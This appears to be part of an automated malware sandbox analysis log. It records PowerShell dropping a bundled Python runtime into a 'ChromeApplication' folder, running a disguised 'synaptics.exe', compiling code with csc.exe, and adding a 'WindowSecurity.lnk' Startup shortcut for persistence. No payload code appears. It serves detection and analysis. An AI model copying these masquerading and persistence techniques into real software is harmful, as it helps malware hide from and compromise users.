Source: C:\Windows\System32\svchost.exeSection loaded: coremessaging.dll
Source: C:\Windows\System32\svchost.exeSection loaded: twinapi.appcore.dll
Source: C:\Windows\System32\svchost.exeSection loaded: onecorecommonproxystub.dll
Source: C:\Windows\System32\svchost.exeSection loaded: execmodelproxy.dll
Source: C:\Windows\System32\svchost.exeSection loaded: resourcepolicyclient.dll
Source: C:\Windows\System32\svchost.exeSection loaded: vssapi.dll
Source: C:\Windows\System32\svchost.exeSection loaded: vsstrace.dll
Source: C:\Windows\System32\svchost.exeSection loaded: samcli.dll
Source: C:\Windows\System32\svchost.exeSection loaded: samlib.dll
Source: C:\Windows\System32\svchost.exeSection loaded: es.dll
Source: C:\Windows\System32\svchost.exeSection loaded: bitsproxy.dll
Source: C:\Windows\System32\svchost.exeSection loaded: ondemandconnroutehelper.dll
Source: C:\Windows\System32\svchost.exeSection loaded: dhcpcsvc6.dll
Source: C:\Windows\System32\svchost.exeSection loaded: dhcpcsvc.dll
Source: C:\Windows\System32\svchost.exeSection loaded: schannel.dll
Source: C:\Windows\System32\svchost.exeSection loaded: mskeyprotect.dll
Source: C:\Windows\System32\svchost.exeSection loaded: ntasn1.dll
Source: C:\Windows\System32\svchost.exeSection loaded: ncrypt.dll
Source: C:\Windows\System32\svchost.exeSection loaded: ncryptsslp.dll
Source: C:\Windows\System32\svchost.exeSection loaded: msasn1.dll
Source: C:\Windows\System32\svchost.exeSection loaded: cryptsp.dll
Source: C:\Windows\System32\svchost.exeSection loaded: rsaenh.dll
Source: C:\Windows\System32\svchost.exeSection loaded: dpapi.dll
Source: C:\Windows\System32\svchost.exeSection loaded: mpr.dll
Source: C:\Users\user\AppData\Local\ChromeApplication\synaptics.exeSection loaded: python310.dll
Source: C:\Users\user\AppData\Local\ChromeApplication\synaptics.exeSection loaded: vcruntime140.dll
Source: C:\Users\user\AppData\Local\ChromeApplication\synaptics.exeSection loaded: version.dll
Source: C:\Users\user\AppData\Local\ChromeApplication\synaptics.exeSection loaded: vcruntime140.dll
Source: C:\Users\user\AppData\Local\ChromeApplication\synaptics.exeSection loaded: cryptsp.dll
Source: C:\Users\user\AppData\Local\ChromeApplication\synaptics.exeSection loaded: rsaenh.dll
Source: C:\Users\user\AppData\Local\ChromeApplication\synaptics.exeSection loaded: cryptbase.dll
Source: C:\Users\user\AppData\Local\ChromeApplication\synaptics.exeSection loaded: kernel.appcore.dll
Source: WindowSecurity.lnk.0.drLNK file: ..\..\..\..\..\..\Local\ChromeApplication\synaptics.exe
Source: Window RecorderWindow detected: More than 3 window changes detected
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorrc.dllJump to behavior
Source: Binary string: C:\src\pywin32\build\temp.win32-cpython-310\Release\shell.pdb source: powershell.exe, 00000000.00000002.2376887692.0000015C00FEA000.00000004.00000800.00020000.00000000.sdmp
Source: Binary string: C:\src\pywin32\build\temp.win32-cpython-310\Release\bits.pdb source: powershell.exe, 00000000.00000002.2376887692.0000015C009D5000.00000004.00000800.00020000.00000000.sdmp
Source: Binary string: debugger_parent = pdb.Pdb source: debugger.py.0.dr
Source: Binary string: C:\src\pywin32\build\temp.win32-cpython-310\Release\win32profile.pdb source: win32profile.pyd.0.dr
Source: Binary string: C:\src\pywin32\build\temp.win32-cpython-310\Release\taskscheduler.pdb!! source: powershell.exe, 00000000.00000002.2376887692.0000015C010DB000.00000004.00000800.00020000.00000000.sdmp
Source: Binary string: D:\a\1\b\bin\win32\_uuid.pdb source: _uuid.pyd.0.dr
Source: Binary string: C:\src\pywin32\build\temp.win32-cpython-310\Release\propsys.pdb88 GCTL source: powershell.exe, 00000000.00000002.2376887692.0000015C00CDA000.00000004.00000800.00020000.00000000.sdmp
Source: Binary string: D:\a\1\b\bin\win32\_decimal.pdb%% source: _decimal.pyd.0.dr
Source: Binary string: D:\a\1\b\bin\win32\pythonw.pdb source: synaptics.exe, 00000007.00000000.2373793259.0000000000542000.00000002.00000001.01000000.00000008.sdmp, synaptics.exe, 00000007.00000002.2397103659.0000000000542000.00000002.00000001.01000000.00000008.sdmp, synaptics.exe, 0000000E.00000000.2491836715.0000000000542000.00000002.00000001.01000000.00000008.sdmp, synaptics.exe, 0000000E.00000002.2494935761.0000000000542000.00000002.00000001.01000000.00000008.sdmp
Source: Binary string: d:\a01\_work\11\s\\binaries\x86ret\bin\i386\\vcruntime140.i386.pdb source: powershell.exe, 00000000.00000002.2376887692.0000015C01CAF000.00000004.00000800.00020000.00000000.sdmp, synaptics.exe, synaptics.exe, 00000007.00000002.2400247419.0000000073A81000.00000020.00000001.01000000.0000000A.sdmp, synaptics.exe, 0000000E.00000002.2496652753.0000000073A81000.00000020.00000001.01000000.0000000A.sdmp, vcruntime140.dll.0.dr
Source: Binary string: C:\src\pywin32\build\temp.win32-cpython-310\Release\ifilter.pdb source: powershell.exe, 00000000.00000002.2376887692.0000015C00B39000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000000.00000002.2376887692.0000015C00B2F000.00000004.00000800.00020000.00000000.sdmp
Source: Binary string: C:\src\pywin32\build\temp.win32-cpython-310\Release\internet.pdb// GCTL source: powershell.exe, 00000000.00000002.2376887692.0000015C00BB2000.00000004.00000800.00020000.00000000.sdmp
Source: Binary string: C:\src\pywin32\build\temp.win32-cpython-310\Release\win32api.pdb!! source: win32api.pyd.0.dr
Source: Binary string: C:\src\pywin32\build\temp.win32-cpython-310\Release\directsound.pdb source: powershell.exe, 00000000.00000002.2376887692.0000015C00A63000.00000004.00000800.00020000.00000000.sdmp
Source: Binary string: C:\src\pywin32\build\temp.win32-cpython-310\Release\shell.pdbll"GCTL source: powershell.exe, 00000000.00000002.2376887692.0000015C00FEA000.00000004.00000800.00020000.00000000.sdmp
Source: Binary string: D:\a\1\b\bin\win32\python310.pdb source: synaptics.exe, 00000007.00000002.2399606581.000000006C6A4000.00000002.00000001.01000000.00000009.sdmp, synaptics.exe, 0000000E.00000002.2496158188.000000006C6A4000.00000002.00000001.01000000.00000009.sdmp
Source: Binary string: scorlib.pdb ~\ source: powershell.exe, 00000000.00000002.2448977890.0000015C7E1DF000.00000004.00000020.00020000.00000000.sdmp
Source: Binary string: C:\src\pywin32\build\temp.win32-cpython-310\Release\directsound.pdb++ source: powershell.exe, 00000000.00000002.2376887692.0000015C00A63000.00000004.00000800.00020000.00000000.sdmp
Source: Binary string: C:\src\pywin32\build\temp.win32-cpython-310\Release\internet.pdb source: powershell.exe, 00000000.00000002.2376887692.0000015C00BB2000.00000004.00000800.00020000.00000000.sdmp
Source: Binary string: .pdbpdblib.pdb source: powershell.exe, 00000000.00000002.2448977890.0000015C7E1DF000.00000004.00000020.00020000.00000000.sdmp
Source: Binary string: mscorlib.pdb source: powershell.exe, 00000000.00000002.2448977890.0000015C7E150000.00000004.00000020.00020000.00000000.sdmp
Source: Binary string: C:\src\pywin32\build\temp.win32-cpython-310\Release\axscript.pdb11 source: powershell.exe, 00000000.00000002.2376887692.0000015C0226F000.00000004.00000800.00020000.00000000.sdmp
Source: Binary string: C:\src\pywin32\build\temp.win32-cpython-310\Release\propsys.pdb source: powershell.exe, 00000000.00000002.2376887692.0000015C00CDA000.00000004.00000800.00020000.00000000.sdmp
Source: Binary string: D:\a\1\b\bin\win32\select.pdb source: select.pyd.0.dr
Source: Binary string: C:\src\pywin32\build\temp.win32-cpython-310\Release\taskscheduler.pdb source: powershell.exe, 00000000.00000002.2376887692.0000015C010DB000.00000004.00000800.00020000.00000000.sdmp
Source: Binary string: C:\src\pywin32\build\temp.win32-cpython-310\Release\bits.pdb++ source: powershell.exe, 00000000.00000002.2376887692.0000015C009D5000.00000004.00000800.00020000.00000000.sdmp
Source: Binary string: D:\a\1\b\bin\win32\pythonw.pdb source: synaptics.exe, 00000007.00000000.2373793259.0000000000542000.00000002.00000001.01000000.00000008.sdmp, synaptics.exe, 00000007.00000002.2397103659.0000000000542000.00000002.00000001.01000000.00000008.sdmp, synaptics.exe, 0000000E.00000000.2491836715.0000000000542000.00000002.00000001.01000000.00000008.sdmp, synaptics.exe, 0000000E.00000002.2494935761.0000000000542000.00000002.00000001.01000000.00000008.sdmp
Source: Binary string: C:\src\pywin32\build\temp.win32-cpython-310\Release\win32api.pdb source: win32api.pyd.0.dr
Source: Binary string: D:\a\1\b\bin\win32\_decimal.pdb source: _decimal.pyd.0.dr
Source: Binary string: D:\a\1\b\bin\win32\_msi.pdb source: _msi.pyd.0.dr
Source: Binary string: C:\src\pywin32\build\temp.win32-cpython-310\Release\win32clipboard.pdb source: win32clipboard.pyd.0.dr
Source: Binary string: C:\src\pywin32\build\temp.win32-cpython-310\Release\win32pdh.pdb source: win32pdh.pyd.0.dr
Source: Binary string: C:\src\pywin32\build\temp.win32-cpython-310\Release\axscript.pdb source: powershell.exe, 00000000.00000002.2376887692.0000015C0226F000.00000004.00000800.00020000.00000000.sdmp
Source: Binary string: C:\src\pywin32\build\temp.win32-cpython-310\Release\mapi.pdb99 source: powershell.exe, 00000000.00000002.2376887692.0000015C00C41000.00000004.00000800.00020000.00000000.sdmp
Source: Binary string: C:\src\pywin32\build\temp.win32-cpython-310\Release\mapi.pdb source: powershell.exe, 00000000.00000002.2376887692.0000015C00C41000.00000004.00000800.00020000.00000000.sdmp
Source: Binary string: The standard debugger class (pdb.Pdb) is an example. source: bdb.py.0.dr
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess created: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe "C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe" /noconfig /fullpaths @"C:\Users\user\AppData\Local\Temp\o3u40tef\o3u40tef.cmdline"
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess created: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe "C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe" /noconfig /fullpaths @"C:\Users\user\AppData\Local\Temp\o3u40tef\o3u40tef.cmdline"Jump to behavior
Source: python310.dll.0.drStatic PE information: section name: PyRuntim
Source: libcrypto-1_1.dll.0.drStatic PE information: section name: .00cfg
Source: libssl-1_1.dll.0.drStatic PE information: section name: .00cfg
Source: mfc140u.dll.0.drStatic PE information: section name: .didat
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeCode function: 0_2_00007FF848F45964 pushad ; iretd 0_2_00007FF848F45969
Source: C:\Users\user\AppData\Local\ChromeApplication\synaptics.exeCode function: 7_2_73A8EB70 push eax; ret 7_2_73A8EB8E
Source: C:\Users\user\AppData\Local\ChromeApplication\synaptics.exeCode function: 7_2_73A8E9C1 push ecx; ret 7_2_73A8E9D4
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile created: C:\Users\user\AppData\Local\ChromeApplication\DLLs\_decimal.pydJump to dropped file
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile created: C:\Users\user\AppData\Local\ChromeApplication\Lib\site-packages\win32\win32inet.pydJump to dropped file
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile created: C:\Users\user\AppData\Local\ChromeApplication\Lib\site-packages\win32\win32clipboard.pydJump to dropped file
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile created: C:\Users\user\AppData\Local\ChromeApplication\Lib\site-packages\win32\win32pipe.pydJump to dropped file
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile created: C:\Users\user\AppData\Local\ChromeApplication\Lib\site-packages\win32\mmapfile.pydJump to dropped file
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile created: C:\Users\user\AppData\Local\ChromeApplication\Lib\site-packages\win32\win32job.pydJump to dropped file
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile created: C:\Users\user\AppData\Local\ChromeApplication\DLLs\_bz2.pydJump to dropped file
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile created: C:\Users\user\AppData\Local\ChromeApplication\Lib\site-packages\win32comext\adsi\adsi.pydJump to dropped file
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile created: C:\Users\user\AppData\Local\ChromeApplication\Lib\site-packages\win32\win32trace.pydJump to dropped file
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile created: C:\Users\user\AppData\Local\ChromeApplication\Lib\site-packages\Crypto\Math\_modexp.pydJump to dropped file
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile created: C:\Users\user\AppData\Local\ChromeApplication\Lib\site-packages\isapi\PyISAPI_loader.dllJump to dropped file
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile created: C:\Users\user\AppData\Local\ChromeApplication\Lib\site-packages\win32\perfmon.pydJump to dropped file
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile created: C:\Users\user\AppData\Local\ChromeApplication\Lib\site-packages\win32\win32process.pydJump to dropped file
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile created: C:\Users\user\AppData\Local\ChromeApplication\Lib\site-packages\charset_normalizer\md.cp310-win32.pydJump to dropped file
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile created: C:\Users\user\AppData\Local\ChromeApplication\Lib\site-packages\win32\_win32sysloader.pydJump to dropped file
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile created: C:\Users\user\AppData\Local\ChromeApplication\DLLs\select.pydJump to dropped file
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile created: C:\Users\user\AppData\Local\ChromeApplication\vcruntime140.dllJump to dropped file
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile created: C:\Users\user\AppData\Local\ChromeApplication\Lib\site-packages\win32\odbc.pydJump to dropped file
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile created: C:\Users\user\AppData\Local\ChromeApplication\Lib\site-packages\win32\win32evtlog.pydJump to dropped file
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile created: C:\Users\user\AppData\Local\ChromeApplication\Lib\site-packages\win32\timer.pydJump to dropped file
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile created: C:\Users\user\AppData\Local\ChromeApplication\Lib\site-packages\win32\perfmondata.dllJump to dropped file
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile created: C:\Users\user\AppData\Local\ChromeApplication\DLLs\sqlite3.dllJump to dropped file
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile created: C:\Users\user\AppData\Local\ChromeApplication\Lib\site-packages\win32\win32console.pydJump to dropped file
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile created: C:\Users\user\AppData\Local\ChromeApplication\DLLs\_asyncio.pydJump to dropped file
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile created: C:\Users\user\AppData\Local\ChromeApplication\Lib\site-packages\win32\win32crypt.pydJump to dropped file
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile created: C:\Users\user\AppData\Local\ChromeApplication\DLLs\_uuid.pydJump to dropped file
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile created: C:\Users\user\AppData\Local\ChromeApplication\Lib\site-packages\Crypto\Cipher\_chacha20.pydJump to dropped file
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile created: C:\Users\user\AppData\Local\ChromeApplication\DLLs\_overlapped.pydJump to dropped file
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile created: C:\Users\user\AppData\Local\ChromeApplication\DLLs\_ssl.pydJump to dropped file
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile created: C:\Users\user\AppData\Local\ChromeApplication\Lib\site-packages\win32\win32ras.pydJump to dropped file
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile created: C:\Users\user\AppData\Local\ChromeApplication\Lib\site-packages\win32\win32wnet.pydJump to dropped file
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile created: C:\Users\user\AppData\Local\ChromeApplication\DLLs\_msi.pydJump to dropped file
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile created: C:\Users\user\AppData\Local\ChromeApplication\Lib\site-packages\win32\winxpgui.pydJump to dropped file
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile created: C:\Users\user\AppData\Local\ChromeApplication\Lib\site-packages\pythonwin\dde.pydJump to dropped file
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile created: C:\Users\user\AppData\Local\ChromeApplication\DLLs\unicodedata.pydJump to dropped file
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile created: C:\Users\user\AppData\Local\ChromeApplication\Lib\site-packages\Crypto\PublicKey\_ed448.pydJump to dropped file
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile created: C:\Users\user\AppData\Local\ChromeApplication\DLLs\winsound.pydJump to dropped file
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile created: C:\Users\user\AppData\Local\ChromeApplication\Lib\site-packages\Crypto\Cipher\_ARC4.pydJump to dropped file
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile created: C:\Users\user\AppData\Local\ChromeApplication\Lib\site-packages\win32\win32file.pydJump to dropped file
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile created: C:\Users\user\AppData\Local\ChromeApplication\Lib\site-packages\win32\win32pdh.pydJump to dropped file
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile created: C:\Users\user\AppData\Local\ChromeApplication\Lib\site-packages\win32\win32help.pydJump to dropped file
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile created: C:\Users\user\AppData\Local\ChromeApplication\Lib\site-packages\win32\win32transaction.pydJump to dropped file
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile created: C:\Users\user\AppData\Local\ChromeApplication\DLLs\_queue.pydJump to dropped file
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile created: C:\Users\user\AppData\Local\ChromeApplication\DLLs\libcrypto-1_1.dllJump to dropped file
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile created: C:\Users\user\AppData\Local\ChromeApplication\Lib\site-packages\win32\win32profile.pydJump to dropped file
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile created: C:\Users\user\AppData\Local\ChromeApplication\python310.dllJump to dropped file
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile created: C:\Users\user\AppData\Local\ChromeApplication\DLLs\_elementtree.pydJump to dropped file
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile created: C:\Users\user\AppData\Local\ChromeApplication\Lib\site-packages\win32\win32print.pydJump to dropped file
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile created: C:\Users\user\AppData\Local\ChromeApplication\Lib\site-packages\Crypto\PublicKey\_x25519.pydJump to dropped file
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile created: C:\Users\user\AppData\Local\ChromeApplication\Lib\site-packages\win32\win32api.pydJump to dropped file
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile created: C:\Users\user\AppData\Local\ChromeApplication\DLLs\_socket.pydJump to dropped file
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile created: C:\Users\user\AppData\Local\ChromeApplication\DLLs\_zoneinfo.pydJump to dropped file
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile created: C:\Users\user\AppData\Local\ChromeApplication\Lib\site-packages\Crypto\PublicKey\_ed25519.pydJump to dropped file
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile created: C:\Users\user\AppData\Local\ChromeApplication\Lib\site-packages\win32\win32ts.pydJump to dropped file
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile created: C:\Users\user\AppData\Local\ChromeApplication\DLLs\_ctypes.pydJump to dropped file
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile created: C:\Users\user\AppData\Local\ChromeApplication\DLLs\_lzma.pydJump to dropped file
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile created: C:\Users\user\AppData\Local\ChromeApplication\Lib\site-packages\charset_normalizer\md__mypyc.cp310-win32.pydJump to dropped file
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile created: C:\Users\user\AppData\Local\ChromeApplication\Lib\site-packages\Crypto\Util\_strxor.pydJump to dropped file
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exeFile created: C:\Users\user\AppData\Local\Temp\o3u40tef\o3u40tef.dllJump to dropped file
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile created: C:\Users\user\AppData\Local\ChromeApplication\Lib\site-packages\win32\win32lz.pydJump to dropped file
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile created: C:\Users\user\AppData\Local\ChromeApplication\DLLs\_hashlib.pydJump to dropped file
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile created: C:\Users\user\AppData\Local\ChromeApplication\Lib\site-packages\win32\win32event.pydJump to dropped file
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile created: C:\Users\user\AppData\Local\ChromeApplication\DLLs\_sqlite3.pydJump to dropped file
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile created: C:\Users\user\AppData\Local\ChromeApplication\Lib\site-packages\pythonwin\mfc140u.dllJump to dropped file
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile created: C:\Users\user\AppData\Local\ChromeApplication\Lib\site-packages\win32\win32service.pydJump to dropped file
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile created: C:\Users\user\AppData\Local\ChromeApplication\DLLs\_multiprocessing.pydJump to dropped file
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile created: C:\Users\user\AppData\Local\ChromeApplication\DLLs\pyexpat.pydJump to dropped file
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile created: C:\Users\user\AppData\Local\ChromeApplication\Lib\site-packages\win32\_winxptheme.pydJump to dropped file
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile created: C:\Users\user\AppData\Local\ChromeApplication\Lib\site-packages\win32\win32security.pydJump to dropped file
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile created: C:\Users\user\AppData\Local\ChromeApplication\Lib\site-packages\Crypto\Util\_cpuid_c.pydJump to dropped file
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile created: C:\Users\user\AppData\Local\ChromeApplication\Lib\site-packages\win32\servicemanager.pydJump to dropped file
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile created: C:\Users\user\AppData\Local\ChromeApplication\synaptics.exeJump to dropped file
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile created: C:\Users\user\AppData\Local\ChromeApplication\Lib\site-packages\pythonwin\Pythonwin.exeJump to dropped file
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile created: C:\Users\user\AppData\Local\ChromeApplication\Lib\site-packages\Crypto\Protocol\_scrypt.pydJump to dropped file
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile created: C:\Users\user\AppData\Local\ChromeApplication\DLLs\libssl-1_1.dllJump to dropped file
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile created: C:\Users\user\AppData\Local\ChromeApplication\Lib\site-packages\win32\win32net.pydJump to dropped file
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile created: C:\Users\user\AppData\Local\ChromeApplication\Lib\site-packages\win32\pythonservice.exeJump to dropped file
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile created: C:\Users\user\AppData\Local\ChromeApplication\DLLs\libffi-7.dllJump to dropped file
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile created: C:\Users\user\AppData\Local\ChromeApplication\Lib\site-packages\win32\win32gui.pydJump to dropped file
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile created: C:\Users\user\AppData\Local\ChromeApplication\Lib\site-packages\Crypto\PublicKey\_ec_ws.pydJump to dropped file
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile created: C:\Users\user\AppData\Local\ChromeApplication\Lib\site-packages\win32\win32cred.pydJump to dropped file
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile created: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\WindowSecurity.lnkJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile created: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\WindowSecurity.lnkJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
